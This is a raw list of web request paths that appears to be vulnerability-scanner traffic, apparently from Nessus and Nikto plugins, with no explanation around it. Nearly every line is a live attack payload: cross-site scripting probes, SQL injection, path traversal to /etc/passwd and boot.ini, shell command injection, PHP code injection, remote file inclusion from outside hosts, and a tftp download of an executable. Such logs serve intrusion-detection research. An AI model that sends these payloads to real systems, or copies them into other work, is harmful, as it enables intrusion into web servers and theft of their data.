/en-us/fo564rei.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/whmch8ftkt7kv??&cmd=ls
/javascript/to.exe
/m4kkjf8l.exe?<meta http-equiv=set-cookie content="testyglc=8988">
/scripts/gdxlwjnlsr6i.php3
/eei78ore.cgi?<script>cross_site_scripting.nasl</script>
/examples/jsp/num/index.php?page=/etc/passwd\x00
/5qnlm5z2.dll?<meta http-equiv=set-cookie content="testsixi=8451">
/fcgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/scripts/kfzqb5x87lvq.php3
/b4vng02k.asp?<script>document.cookie="testtrlh=3672;"</script>
/scripts/item.fts?href="><script>alert("ftgate_44002.nasl")</script>;
/scripts/test11.asp
/main.php?stuff="\x0adel\x09q74494385\x09#
/?<script>document.cookie="testwldz=3506;"</script>
/en-us/account/index.php?id='
/cgi-915/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/phpmyadmin/htsearch?exclude=`/etc/passwd`
/fc9t54l7.jsp?<meta http-equiv=set-cookie content="testggad=2000">
/forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini
/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/moclyxlwqyfjnp?
/examples/jsp/jsp2/jspx/starnet/addons/slideshow_full.php?album_name='2005084173
/javascript/benefits.exe
/hrttz9fj.exe?<meta http-equiv=set-cookie content="testtbjy=7334">
/top.php?stuff=&ver\xa0>q92247843&rem\xa0
/scripts/kernel/loadkernel.php?installpath=/etc/passwd\x00
/h21y8w52.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
ftp://192.168.24.253/*<apache_mod_proxy_ftp_glob_xss.nasl>
/l752x1ry.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/search.jsp?q=%"<script>alert(1331909235)</script>
/www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_dllvu4k6]));die;/*
/en-us/account/index.php?id='union/**/select/**/0,0,1647791366,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/examples/servlets/servlet/includes/converter.inc.php?include_path=/etc/passwd\x00
/help.php?q='sleep 8 #
/iktok2bw.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/~ftp.exe
/sprotectlinux/showpage.cgi?page=../html/splx_main.htm
/help.php?q="&ping -w 8000 -n 1 1.2.3.4&rem
/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
/javascript/document.bat
/static//\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xaeetc/passwd
/6dlc2zm9.do?<script>document.cookie="testqpux=4016;"</script>
/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331919174')</script>
/ju0u7kfo.jsp?<script>cross_site_scripting.nasl</script>
/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6~
<script>document.cookie="testjvvf=7721;"</script>
/egaet53a.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff=ver;>q99348313&rem;
/recordings/pmwiki.php?globals[farmd]=/etc/passwd\x00
/examples/jsp/error/pfdispaly.cgi?../../../../../../etc/passwd
/bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/ewc3rz1l.idc?<meta http-equiv=set-cookie content="testkgqo=204">
/en-us/dda2qr7j.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/m4kkjf8l.asp?<script>document.cookie="testyglc=8988;"</script>
/mpcgi/ion-p?page=../../../../../etc/passwd
/examples/jsp/checkbox/index.php?cat='
/h4bi26jd.aspx?<script>document.cookie="testhrzx=1150;"</script>
/examples/jsp/colors/add_url.htm?node=<script>alert('xss')</script>
/subscriptions.jpg
/t578vqea.htm?<script>document.cookie="testsory=7676;"</script>
/examples/jsp/error/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd
/javascript/htpasswd.py
/scripts/index.php?board=nonexistant674192050
/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/top.php?stuff=ver\x0b>q75783184&rem\x0b
/scripts/9pen4xzgztjn.sh
/examples/jsp/checkbox/index.php?id=0rop9yeuxw'
/examples/jsp/jsp2/jspx/al_initialize.php?alpath=/etc/passwd\x00
/d5a5renl.kspx?<script>cross_site_scripting.nasl</script>
/y8pmygrp.htm?<script>cross_site_scripting.nasl</script>
/javascript/pubs.exe
/help.php?q="&rm\x09q57946156\x09#
/en-us/hipkz026.php?<meta http-equiv=set-cookie content="testyrbs=2855">
/scripts/1hactwocbsuo.cfm
/main.php?logout=\x0auname\x09>q18697999\x09#
/scripts/servubrowse.asp
/javascript/submit.exe
/help.php?q="ver\x09>q14739543&rem\x09
/cgis/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/p043snfr.php3?<script>cross_site_scripting.nasl</script>
/scripts/vzdybnanqpc3.php
/i686v90l.cfc?<script>document.cookie="testfutf=1550;"</script>
//../../../../../../../../etc/passwd\x00
/cgis/a1disp3.cgi?../../../../../../../../../../etc/passwd
/hrttz9fj.fts?<script>document.cookie="testtbjy=7334;"</script>
/cgi-bin/showproduct.php?product=1'
/bb000001.pl<script>alert('vulnerable')</script>
/examples/jsp/jsp2/jspx/config.php?returnpath=/etc/passwd\x00
/i7prbs22.cgi?<script>document.cookie="testjnre=7328;"</script>
/cacti/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/examples/jsp/jsp2/jspx/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd
/help.php?q='\x0auname\x09>q12762848\x09#
/cacti/cal_week.php?op=week&catview=999'
/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
messagedetail.asp?msg_id='
/um7xpn15.mscgi?<script>document.cookie="testotoy=6142;"</script>
/main.php?logout="|ping -w 9000 -n 1 4.3.2.1|rem
/scripts/zq9frlz6fcfp.php
/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd
/0z575z74.htm?<script>document.cookie="testuhsv=9753;"</script>
/recordings/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/cgi-bin/guestbook/passwd
/8x6w469u.kspx?<script>document.cookie="testgfjr=1286;"</script>
/kerkhoffs'_law/
/javascript/document.msg
/i686v90l.kspx?<meta http-equiv=set-cookie content="testfutf=1550">
/javascript/replicated.exe
/3j8echh0.html?<meta http-equiv=set-cookie content="testfuqi=4189">
/examples/servlets/servlet/rss.php?blogid=1&profile=../../config/config.properties.php\x00
/scripts/zq9frlz6fcfp.cfm
/cacti/calendar.php?serverpath=/etc/passwd\x00
/cgibin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/main.php?stuff="ver\xa0>q63696925&rem\xa0
/phpnuke/html/.php?name=network_tools&file=index&func=ping_host&hinput=;id
/recordings/shoutbox.php?conf=../
/demos/demo.browse.php?filename=/etc/passwd
/<script>document.cookie="testvowq=604;"</script>
/fpnpp5zg.pl?<meta http-equiv=set-cookie content="testyias=101">
/scripts/weigh_keywords.php?etcdir=http://cirt.net/rfiinc.txt?
/j4rdyhw8.php?<script>document.cookie="testrluj=1420;"</script>
/help.php?q=";uname >q49727674 #
/main.php?logout=/'
/main.php<?eval($_post['q54461335']);?eval($_post['q54461335']);?>
/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 412834017--
/s7qus4g3.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/script_saved/
/comments.php?scriptpath=http://192.168.202.96:8080/frznctvhi0i5??
/index.php?page=../../../../../../../../../../../../../../../../../winnt/system32/ipconfig.exe
/m2fpztty.pl?<script>cross_site_scripting.nasl</script>
/phpmyadmin/index.php?string='
/tuwjta1w.htm?<script>document.cookie="testpokn=7494;"</script>
/cleartrust/ct_logon.asp?ctauthmode=basic&ctloginerrormsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"
/cgi-915/ppdscgi.exe
/main.php?logout="ping;-w;10000;-n;1;4.3.2.1&rem;
/javascript/nude.exe
/y8pmygrp.do?<script>cross_site_scripting.nasl</script>
/scripts/counter.exe
/vac1l5vm.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/ybz5rz7a.php?<script>document.cookie="testsbvw=6289;"</script>
/examples/jsp/jsp2/jspx/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
/javascript/htpasswd.rhtml
/ju0u7kfo.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/misc/audio.php?recording=../version.inc
/grid_subscriptions2/
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=lnu3g9zkqrlule9mw
/examples/jsp/colors/hw3.cgi?daysonly=0).system('id').(
/eei78ore.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
../../../../../../../../../../../../etc/passwd
/<meta http-equiv=set-cookie content="testsixi=8451">
/javascript/hp.exe
/qhvu0pdg.php?<script>document.cookie="testchuc=2100;"</script>
/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id=
/main.php?logout=';uname >q89385457 #
/scripts/ggvfa_wichxq.asp
/eei78ore.php?<script>cross_site_scripting.nasl</script>
/javascript/.passwd.dll
/src/scripture.php?pageheaderfile=@rfiurl?pageheaderfile=@rfiurl?
/securecgi-bin/csusercgi.exe?help+00.abcd.e.fghijk"""><script>alert("""xss""")</script>
/index.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp?
/javascript/pc.exe
http://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.cfm
<meta http-equiv=set-cookie content="testjvvf=7721">
/cgi-perl/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/nsn/..\util/ren.bas
/examples/servlets/servlet/faxsurvey?cat /etc/passwd
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/fetpkvinrp.sh+>+/dev/null+&')."]=1
/en-us/jnv890lt.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/save.php?file_save=/etc/passwd
/phpmyadmin/notify?from=nessus"|id"
/examples/jsp/error/index.php?op=default&date=200607' union select 1,1200541698,1,1,1,1,1,1,1,1--&blogid=1
/help.php?q="ping;-w;11000;-n;1;4.3.2.1&rem;
/scripts/zdbyw3dn3gh2.html
/q703m78q.kspx?<script>document.cookie="testvowq=604;"</script>
/main.php?stuff="&ver;>q22147997&rem;
/help.php?q="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?
/v3axg1p8.cfm?<meta http-equiv=set-cookie content="testxagh=6987">
/p043snfr.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?logout="|ping;-w;11000;-n;1;1.2.3.4|rem;
/javascript/stored.exe
/launch.asp?nfuse_application=<script>alert('vulnerable')</script>
/cacti/dsweb/services/user-1"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>
/p043snfr.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/xfkun1ku.htm?<script>cross_site_scripting.nasl</script>
/ghswfouu.cfm?<script>document.cookie="testsqmm=5713;"</script>
/top.php?stuff="rm\x09q12423295&rem\x09
/main.php?stuff=&uname >q17531529 #
/h5sc3gxy.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/reference.exe
/interface/login/login_frame.php?site="><!--#exec cmd="dir \"--><
/scripts/vzdybnanqpc3.asp
/main.php?stuff="&sleep\x099\x09#
/en-us/oie504mr.php3?<script>document.cookie="testtpby=7052;"</script>
/scripts/k0pxpjgnimox.cfm
/de3v2dd9.aspx?<script>cross_site_scripting.nasl</script>
<meta http-equiv=set-cookie content="testabrn=6368">
/x7pclv4s.kspx?<meta http-equiv=set-cookie content="testiulz=3709">
/scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/fnwhrxyd.htm?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script
/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
/examples/servlets/servlet/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl
/bxnyrhmh.aspx?<meta http-equiv=set-cookie content="testmjct=1867">
/scripts/misc/info.php
/ybz5rz7a.html?<script>document.cookie="testsbvw=6289;"</script>
<script>document.cookie="testbnli=1975;"</script>
/help.php?q="&ping\x09-w\x098000\x09-n\x091\x094.3.2.1&rem\x09
/<meta http-equiv=set-cookie content="testxagh=6987">
/main.php?stuff="rm q23955852 #
/scripts/ubbthreads.php
/azcrfs8d.jspa?<meta http-equiv=set-cookie content="testjpdr=9205">
/examples/servlets/servlet/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/b5xdqgz2.cgi?<script>cross_site_scripting.nasl</script>
/169okeyj.mscgi?<script>document.cookie="testxeoi=3573;"</script>
/scripts/axdgpyi2bn6f.php
/scripts/msmmask.exe?mask=/nessus312940811.asp
/recordings/admin.php?style=../../../../../../../../../../../../etc/passwd\x00
/examples/jsp/checkbox/index.php?templates_dir=/etc/passwd\x00
/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010394')</script>
/javascript/message.exe
/scripts/d3z7yywpyeoa.pl
/top.php?stuff="&ver&rem
/examples/servlets/servlet/resetpw.php?email=../../../../../../../../../../../../etc/passwd
/javascript/solved.exe
/index.php?action=search&searchfor=\"><script>alert('vulnerable')</script >
/main.php?stuff="&ver;>q86839174&rem;
/oie504mr.nsf?<script>document.cookie="testtpby=7052;"</script>
/nyvbv05h.cgi?<script>document.cookie="testftxz=5980;"</script>
/javascript/dbmodules.exe
/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1
/examples/jsp/cal/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
/fpnpp5zg.asp?<script>document.cookie="testyias=101;"</script>
ftp://192.168.28.202/*<apache_mod_proxy_ftp_glob_xss.nasl>
/raanw4ia.mscgi?<script>cross_site_scripting.nasl</script>
/cgibin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/scripts/k0pxpjgnimox.shtml
/h5i6crm3.mscgi?<meta http-equiv=set-cookie content="testlihk=7070">
/hipkz026.php?<script>document.cookie="testyrbs=2855;"</script>
/6n7aacgg.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/num/demos/demo.browse.php?filename=/etc/passwd
/jnt3f86c.htm?<meta http-equiv=set-cookie content="testcmax=9270">
/help.php?q=uname\x09>q77267797\x09#
/bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/javascript/ppt.exe
/dda2qr7j.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/j2kdmfw4.cfc?<script>cross_site_scripting.nasl</script>
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --
/examples/jsp/jsp2/jspx/index.php?user_langue=../../../../../../../../../../etc/passwd
/0rufe52p.php3?<script>cross_site_scripting.nasl</script>
/static//..\..\..\..\..\..\..\..\etc/passwd
/cgi-915/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/main.php?stuff="ping,-w,9000,-n,1,4.3.2.1&rem,
/_vti_bin/shtml.exe
/help.php?q="rm\x0cq43711515&rem\x0c
/main.php?stuff=";rm\x09q18442351\x09#
/cgi-bin/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/main.php?stuff="ping -w 10000 -n 1 4.3.2.1&rem
/nuh3zirz.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/o6ebbirj.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/viewcvs.cgi/?cvsroot=<script>foo</script>
/javascript/~log.exe
/cgi-bin/index.php?op=default&date=200607' union select 1,1192121872,1,1,1,1,1,1,1,1--&blogid=1
/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--
/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?
/phpmyadmin/documentation.html?'"=1
/index.php?cid='
/cacti/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/examples/jsp/sessions/sawmill6cl.exe?ho+{complete_version}
/apavxugx.jsp?<script>document.cookie="testdnbh=5237;"</script>
/javascript/pool.exe
/examples/jsp/num/index.php?_language=../../../../../../../../../../etc/passwd\x00
/aj3pf49c.cfm?<script>document.cookie="testnofv=4170;"</script>
/main.php?logout="&ping,-w,11000,-n,1,4.3.2.1&rem,
/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql+--&pass=x
/scripts/weigh_keywords.php?etcdir=http://192.168.202.96:8080/4dckqcc0acprbz?
/9ko6m4c8.php3?<meta http-equiv=set-cookie content="testylik=3403">
/scripts/index.php?id='union/**/select/**/0,0,521532225,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/top.php?stuff="&del q85387982 #
/javascript/.passwd.csproj
/javascript/catalogs.exe
/jdx255ea.cfc?<meta http-equiv=set-cookie content="testziyq=5055">
/recordings/phf?qalias=x\x0a/bin/cat /etc/passwd
/examples/jsp/num/popup.php?include_path=/etc/passwd\x00
/top.php?stuff="\x0asleep\x097\x09#
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
/en-us/9kr0ih0v.asp?<script>document.cookie="testzgnm=1183;"</script>
/javascript/running.exe
/cgi-bin/home/search.asp?nchannel='1
/main.php?logout="del q21367835&rem
/cgi-bin/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/rv98iwjp.htm?<script>cross_site_scripting.nasl</script>
/cgi-bin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/phpmyadmin/documentation.html?phpmyadmin=/etc/passwd
/examples/jsp/error/calendar_admin.pl?config=|cat /etc/passwd|
/scripts/ck8pj.exe?/x+/c+tftp -i 192.168.202.118 get durjhxa1 qowmcdks.exe
/phpmyadmin/documentation.html?phpmyadmin=|cat /etc/passwd|
/main.php?logout='del\x09q76232693\x09#
/examples/jsp/num/install.php?newlang=../../cpg_error.log\x00
/javascript/closing.exe
/javascript/monitoring.exe
/en-us/fo564rei.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/prescription010507/
/if69ddo1.nsf?<meta http-equiv=set-cookie content="testiabz=5220">
/javascript/roaming.exe
/6qbynt4f.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/jnv890lt.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/6qbynt4f.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/3hlysl2x.pl?<meta http-equiv=set-cookie content="testgjbe=8505">
/main.php?logout="ping;-w;11000;-n;1;4.3.2.1&rem;
/examples/jsp/cal/calendar_admin.pl?config=|cat /etc/passwd|
/cgi-bin/search.jsp?q=%"<script>alert(1332008604)</script>
/rtph263dumpscript/
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=10nbpndw5e2ir1ncx
/cgi-bin/mlog.html?screen=/etc/passwd
/main.php?stuff="&ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09
/examples/jsp/jsp2/jspx/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/zroo33l4.php?<meta http-equiv=set-cookie content="testiklc=904">
/top.php?stuff='\x0asleep\x097\x09#
/scs86g1p.cfc?<script>document.cookie="testquyx=2820;"</script>
/d5a5renl.html?<script>cross_site_scripting.nasl</script>
/scripts/mapserv?map=mapserver_detect.nasl.map
/javascript/corporate.exe
/phpmyadmin/index.php?chemin=../../../../../../..//etc
/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
/ju0u7kfo.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/shoutbox/expanded.php?conf=../../../../../../../etc/passwd
/help.php?q="rm\x09q12928131\x09#
/en-us/account/more.php?id=1'
/examples/servlets/servlet/forum_2.php?msg=10&return=<script>foo</script>
/m2fpztty.idc?<script>cross_site_scripting.nasl</script>
/l13b77e5.htm?<script>document.cookie="testjvvf=7721;"</script>
/javascript/.passwd.stackdump
/examples/jsp/num/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/javascript/code.exe
/manager/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
/o1zj4u9v.asp?<meta http-equiv=set-cookie content="testabrn=6368">
/help.php?q='\x0auname #
/javascript/hit.exe
/main.php?stuff="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09
/subscriptions.doc
/include/scripts/run_auto_suspend.cron.php?dir=@rfiurl
/nyjgaorz.kspx?<script>cross_site_scripting.nasl</script>
<meta http-equiv=set-cookie content="testrluj=1420">
/bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
/jnt3f86c.dll?<meta http-equiv=set-cookie content="testcmax=9270">
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\x00
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/ukirnkmpbn"
/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz??
/cgi-914/powerup/r.cgi?file=../../../../../../../../../../etc/passwd
/main.php?stuff=&ver,>q61913742&rem,
/3j8echh0.php?<meta http-equiv=set-cookie content="testfuqi=4189">
/subscriptions.config
/tlhhwkvs.exe/
/javascript/auth.exe
/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/urcppbumwm0;echo|awstats379091.txt
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00
/help.php?q=uname >q18373347 #
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/speech-transcript/
/zv8tv7h8.do?<script>document.cookie="testcqwz=9752;"</script>
/t7tm4m0b.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/manager/index.php?op=default&date=200607' union select 1,1128524552,1,1,1,1,1,1,1,1--&blogid=1
/help.php?q='\x0adel\x09q47355772\x09#
/examples/jsp/sessions/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>
/m2fpztty.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/sawmillcl.exe?ho+{complete_version}
/sscript/
/cgi-bin/webplus?script=/../../../../etc/passwd
/subscriptions.part
/g8nu2yy7.jspa?<script>cross_site_scripting.nasl</script>
/top.php?stuff=';rm q26271527 #
/scripts/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/7dbjwpw6.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgibin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/top.php?stuff="ping -w 7000 -n 1 1.2.3.4&rem
/cgi-bin/index.php?p='nessus
/main.php?stuff="sleep 11 #
/en-us/odzk29aa.nsf?<script>document.cookie="testtfvh=2141;"</script>
/scripts/prnnucptkixl.php
/ju0u7kfo.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/ydexw8by.x?<meta http-equiv=set-cookie content="testulex=4996">
/main.php?logout="&uname >q45435148 #
/cgi-win/ion-p?page=../../../../../etc/passwd
/cgibin/gw5/gwweb.exe?help=bad-request
/j4rdyhw8.fts?<script>document.cookie="testrluj=1420;"</script>
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/djjeroppey.sh'); function v
/scripts/ylrvly9nh_pf.inc
/scripts/index.php?op=default&date=200607' union select 1,1100287420,1,1,1,1,1,1,1,1--&blogid=1
/scripts/vhost.php?action=logout&time=1331908735
/scripts/kfzqb5x87lvq.pl
/newsletter_log.php?logfile=info.php&logtime=000060&email=<?php echo md5("test"); ?>
/ao22ww7y.do?<script>document.cookie="testqppc=8767;"</script>
/javascript/globals.exe
/b5xdqgz2.exe?<script>cross_site_scripting.nasl</script>
/jw64yq8u.x?<meta http-equiv=set-cookie content="testylfu=1313">
/scripts/gitweb.pl
/main.php?logout='&del q16695623 #
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919202
/uvazfs7p.pl?<meta http-equiv=set-cookie content="testwtbo=4831">
/cgi-bin/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
/examples/jsp/error/faq.php?action=&type=view&s=&id=-1' union select 0,157871866,0,0,0,0,0--
/top.php?stuff='\x0auname\x09>q23871271\x09#
/manager/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/javascript/subscription.exe
/ju0u7kfo.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/manager/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
/recordings/index.php?chemin=../../../../../../..//etc
/en-us/account/home/search.asp?nchannel='1
/javascript/_vti_cnf.exe
/0qhcnefz.aspx?<script>cross_site_scripting.nasl</script>
/ssxmagazinesubscription/
/en-us/<img src="javascript:alert(cross_site_scripting.nasl);">.dll
/examples/servlets/servlet/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435
/examples/jsp/checkbox/newsscript.pl?mode=admin
/en-us/ddoworrl.asp?<script>document.cookie="testvlau=8517;"</script>
/javascript/resolution.exe
/examples/jsp/jsp2/jspx/include/sql.php?include_path=/etc/passwd\x00
/scripts/vzdybnanqpc3.inc
/\x80../\x80../\x80../\x80../\x80../\x80../winnt/win.ini
/fcgi-bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/cgis/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/javascript/programs.exe
/help.php?q=&uname\x09>q82939622\x09#
/t3af3tdz.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/index.php?board=nonexistant1419816536
/b5xdqgz2.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/bn857frh.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/s7qus4g3.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/scgi-bin/.htpasswd
/phpmyadmin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00
/en-us/account/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/recordings/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/dslpwt15.do?<script>document.cookie="testtkio=5454;"</script>
/mom's ass/
/javascript/1994.exe
/scripts/qg9h0c0svvat.sh
/606wkcop.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/en-us/s7qus4g3.cfm?<script>cross_site_scripting.nasl</script>
/vhzmaia2.cfm?<meta http-equiv=set-cookie content="testkogj=3979">
/javascript/htpasswd.pl
/main.php?stuff="&ping,-w,11000,-n,1,1.2.3.4&rem,
/i2n4v4rl.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/postnuke/html/modules.php?op=modload&name=news&file=article&sid=<script>alert('vulnerable');</script>
/scripts/search.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??
/en-us/account/index.php?act=arcade&do=stats&gameid=1'
/g8nu2yy7.kspx?<script>cross_site_scripting.nasl</script>
/javascript/document.sfish
/help.php?q="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/7dbjwpw6.nsf?<script>cross_site_scripting.nasl</script>
/ny1b3qq4.x?<script>cross_site_scripting.nasl</script>
/faq.php?action=&type=view&s=&id=-1' union select 0,1323875856,0,0,0,0,0--
/scs86g1p.cfc?<meta http-equiv=set-cookie content="testquyx=2820">
/cgi-home/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/oncixdescription/
/en-us/oie504mr.x?<script>document.cookie="testtpby=7052;"</script>
/main.php?logout=&ping;-w;7000;-n;1;4.3.2.1&rem;
/search.jsp?q=%"<script>alert(1331905049)</script>
/scripts/man-cgi?section=0&topic=ls;id
/xsskj3/
/main.php?stuff='\x0auname\x09>q47233887\x09#
/examples/jsp/jsp2/el/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd
/1r8cfrlf.kspx?<meta http-equiv=set-cookie content="testydan=5106">
/scripts/mensajeitor.php
/passwdage/
/en-us/splunk_413_404error_xss.nasl-1331904921
/bl8sefdm.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/banners.php?op=emailstats&cid=1 and passwd like 'a%'/*
/script/
/scripts/breakcal/calendar.cgi
/javascript/pipermail.exe
/examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1364632458,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/bmeun223.cfm?<script>document.cookie="testhhwu=7044;"</script>
